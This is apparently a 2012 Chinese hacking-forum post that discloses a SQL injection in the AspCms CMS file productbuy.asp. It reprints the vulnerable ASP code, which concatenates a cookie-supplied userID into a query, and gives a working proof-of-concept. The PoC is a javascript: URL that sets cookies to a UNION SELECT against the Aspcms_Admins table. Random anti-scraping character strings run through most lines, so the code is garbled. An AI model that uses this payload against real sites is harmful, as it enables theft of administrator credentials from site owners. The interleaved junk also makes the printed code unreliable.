好久没上土司了,上来一看发现在删号名单内....., t7 T* ]& ^* A, S. a
也没啥好发的,前些天路过某个小站,用的AspCms这个系统,搜索了下,productbuy.asp这个文件存在注射,但是目标已经修补....下载了代码,很奇葩的是productbuy.asp这个文件官方虽然修补了网上提到的漏洞,但是就在同一个文件下面找到了注射漏洞。。。。。。。
0 x6 y, z& I |, G# \# T2 w废话不多说,看代码:
, c R% W: \; u$ O3 X: d- ?7 t' q" ?* r) P- }
<%
W# o6 g4 ]" O& K/ ?, s4 [* |
& Q! Y! c' X4 t* `) D% wif action = "buy" then
" g) h+ F; h" X, q5 o/ n, ~( y
# n0 }7 O& {/ ^" _4 Y7 o addOrder()
8 z/ Y, ~2 Q& a# j
, J9 s5 u$ k; X+ n% O! C! Nelse
; M7 B7 B4 T4 U$ I* |4 b' R5 Q
2 K% Z3 l8 ?8 `1 y echoContent()2 b7 M" u2 {, V$ A# M
* T! |: F2 z! d5 u ?. h/ a& l5 Xend if$ F; \0 C; ^2 g0 D( T
$ k) }2 t, P: g5 B' d/ ~
7 z( \9 C5 y& O5 g9 `1 p! ]2 q+ \" p5 H
……略过1 \' p1 s& D+ s, L/ `
7 G8 ]; o2 ?% J2 u7 _) ^+ _
0 a3 C0 j A9 d# [/ ]0 I' h6 d; U0 V0 ?1 _: [' `
Sub echoContent()
" x. \5 C; h0 O2 O9 ^
( n: B% E% Z* X! c4 F1 M- @ dim id
) U: z+ d& [/ z5 z
4 R3 G7 o+ r: c, h id=getForm("id","get")
, I8 W9 m- z. A' u+ h5 w; l" X# G4 c: |, j5 U, I
) O/ V; g u' F. \3 O$ Y+ x7 w, V7 ~6 ]0 ~4 l8 ]1 f
if isnul(id) or not isnum(id) then alertMsgAndGo "请选择产品!","-1" ; B2 z4 z: Q& V# O- G* `6 { u8 ]
4 ?, d; D4 k/ k$ _3 C$ P7 |
$ B1 ~7 s( Z; J$ n! Q6 I
0 y: L8 C' T; O# V
dim templateobj,channelTemplatePath : set templateobj = mainClassobj.createObject("MainClass.template")
" d3 ?5 i9 m, o6 w& g( ^) R; j/ S- B- e0 v4 `: h- @
dim typeIds,rsObj,rsObjtid,Tid,rsObjSmalltype,rsObjBigtype,selectproduct
$ m6 r9 r8 e5 S ~$ \ D0 n# e: q( V6 q9 ~0 \8 ^
Dim templatePath,tempStr
& W& D8 y* f5 k3 B: Y% i7 A' B$ m
9 |+ E8 D3 p3 T' {8 R templatePath = "/"&sitePath&"templates/"&defaultTemplate&"/"&htmlFilePath&"/productbuy.html"' c- V' ^6 ]2 U: d9 x, b5 K5 m' Y
' Y% j) l5 `- O' E' b) [- q( Q, [0 N+ s, Q1 n
7 n6 B: T! ^$ j set rsObj=conn.Exec("select title from aspcms_news where newsID="&id,"r1")4 I' C% H5 {$ ~* S& }3 ]- j
: i: V O" G7 x selectproduct=rsObj(0)2 n" {+ A) n1 R: O' c0 C/ y
2 e6 @8 |" p ^: g4 A
; e7 s( b9 h5 g9 j" i% B6 X% l4 B% S6 s' ^2 ^1 i4 ]
Dim linkman,gender,phone,mobile,email,qq,address,postcode& k$ |3 z: M1 F; j3 H) L) d, V
1 t$ N5 D. {7 }# Z; R3 T! R2 F1 R. ~ if isnul(rCookie("loginstatus")) then wCookie"loginstatus",07 a3 a3 E9 K% [) t; E5 M" c& v9 m
& s3 z; [$ W6 U1 e: A% g. o n0 | if rCookie("loginstatus")=1 then ! }% {3 s9 z1 x/ U$ j, U3 k
; O5 ~3 k7 Y- A9 p! H
set rsObj=conn.Exec("select * from aspcms_Users where UserID="&trim(rCookie("userID")),"r1")
% W& q6 s1 K& y3 t* K6 O* s# h6 S. o: Z0 R5 m, }" G
linkman=rsObj("truename")
& r' M/ N) }- v, T0 _
2 V# H, u6 }$ t* S$ B9 u$ a/ x gender=rsObj("gender")
" a5 x/ m7 ]- D+ ^6 c0 T/ e
8 O3 b$ ~& e- |& L phone=rsObj("phone")
- l& u: T' h N2 `+ z
! l" F9 C' W" U1 g P% D% d mobile=rsObj("mobile") f1 a8 n; p6 e0 j8 P" i; c [
3 v- z. r. n, p4 e/ F& j email=rsObj("email")
& v8 Y4 G& V6 o, H2 M, d2 K, t6 p- ?$ F
qq=rsObj("qq")/ o- @( b+ p* @: @/ N9 z0 T
' f# s# s- s, B' H9 l
address=rsObj("address")
o; D) d5 c. l3 l% E0 E6 i; |* p; @% o( V
postcode=rsObj("postcode")
6 }9 Z: W: a7 i1 H7 z/ q+ ]% S: Z& }/ @4 D2 \ U
else * s) r( [) ?3 \7 r
0 s! q- k/ h* Y( W; e( R1 u
gender=16 V. {2 _' b8 A
$ ^9 u) A- s/ H, x Y5 n$ p* V end if" ]# |* y' m. L5 _- a
1 Z/ v7 k3 ~ b! \
rsObj.close()
. _0 @2 I: u' [ A/ Q' U6 t9 T2 ]# t. B6 ?, u) K+ {
; b1 D6 x) P6 r; y! A4 n k6 ?9 @
q" r" H @% W% ?" F9 C with templateObj
6 L! z* L8 B1 U2 Q1 k: i' G6 ]" W2 U, n' |' j
.content=loadFile(templatePath) . Z# l/ z& t; O( _
' @; r1 f, H; m+ Q% T% b' i .parseHtml()+ B; ^ z- f6 o' p D& }1 h
$ {! I& V! J) B" n& d( e8 p6 ? .content=replaceStr(.content,"{aspcms:selectproduct}",selectproduct)- u/ X5 o" o% J. x$ e, F- o
. Q# G- V, h! V& U/ w7 `# `3 A- `& Y0 [ .content=replaceStr(.content,"[aspcms:linkman]",linkman)
% a" d1 c/ B5 A& z! S- c) J; C0 K+ B- t- Q. s: b$ V
.content=replaceStr(.content,"[aspcms:gender]",gender) 7 D+ f# \" A2 u: k3 z& g" `
3 A1 H( T; g) F! W! l .content=replaceStr(.content,"[aspcms:phone]",phone)
. \# _/ K, ^+ S! m5 g
; c* ?( J& M8 E# g) m# ] .content=replaceStr(.content,"[aspcms:mobile]",mobile) / o0 Z$ @$ Z% v4 G
" l. T A( t% f1 T .content=replaceStr(.content,"[aspcms:email]",email) ^: N+ X- Q& v% m. U
, B! q: F3 B9 z# R0 g .content=replaceStr(.content,"[aspcms:qq]",qq)
& c n5 R% O7 D$ A
s! R; t/ @) K- z+ `1 U .content=replaceStr(.content,"[aspcms:address]",address)
9 |6 Q1 ?, x( P% ~" b8 T8 M* w6 D! M
.content=replaceStr(.content,"[aspcms:postcode]",postcode) " K, ^9 @3 g d4 ]9 p8 P
$ M. z, s }1 f# k& B .parseCommon() + I: A- u+ f: {5 i( n; c, V1 i4 y
1 D' B% ?6 ?" N* z' I5 ]4 ?' P8 y
echo .content 8 j3 u. J. K- b8 O
- V% Q: I" ]- a end with
2 M( p* ~ V( @# o! B1 Q0 Y7 L9 l+ v: B) b7 e& N0 C' n& y" j
set templateobj =nothing : terminateAllObjects
. q+ v1 k& p9 ~& m; ?% q& A! P# m- X) |- P, l% z9 V
End Sub
1 {2 p. q. l: ?* B: U( m漏洞很明显,没啥好说的7 E4 W) N# w' k- }
poc:
) i j4 d9 p& m8 M: C6 B& ?' A$ F; W2 i2 A# W* N/ s: v' x9 ]& A% }
javascript:alert(document.cookie="loginstatus=" + escape("1"));alert(document.cookie="userID=" + escape("1 union select 1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2 from [Aspcms_Admins]"));另外,脚本板块没权限发帖子
6 b7 L( n; P9 ~3 l }( r
- X* U! S" ]# L9 W5 S |
发表于 2012-12-27 08:35:05
收藏
支持
反对